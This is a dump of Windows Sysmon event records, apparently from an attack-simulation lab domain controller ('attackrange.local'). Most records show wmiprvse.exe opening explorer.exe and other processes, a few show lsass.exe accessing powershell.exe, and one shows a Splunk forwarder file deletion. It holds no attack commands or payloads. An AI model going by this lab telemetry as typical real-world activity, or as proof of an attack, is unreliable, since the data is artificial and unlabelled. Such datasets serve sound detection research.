16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242837Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242836Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-622C-603E-DEA8-00000000AD01}7332C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242835Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242834Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242833Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242832Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242831Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242830Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242829Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242828Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28A33399C051485C5F6317E58B55FFB1,SHA256=9B913C57BDFCB634E27DE78F9A76770995A135B34E0FFC60D2AC301F940BBA8B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242827Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242826Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242825Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242824Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242823Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242822Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6DD3-603E-D6AA-00000000AD01}10156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242821Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.186{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6DD3-603E-D6AA-00000000AD01}10156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242820Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242819Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242818Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.175{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242817Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 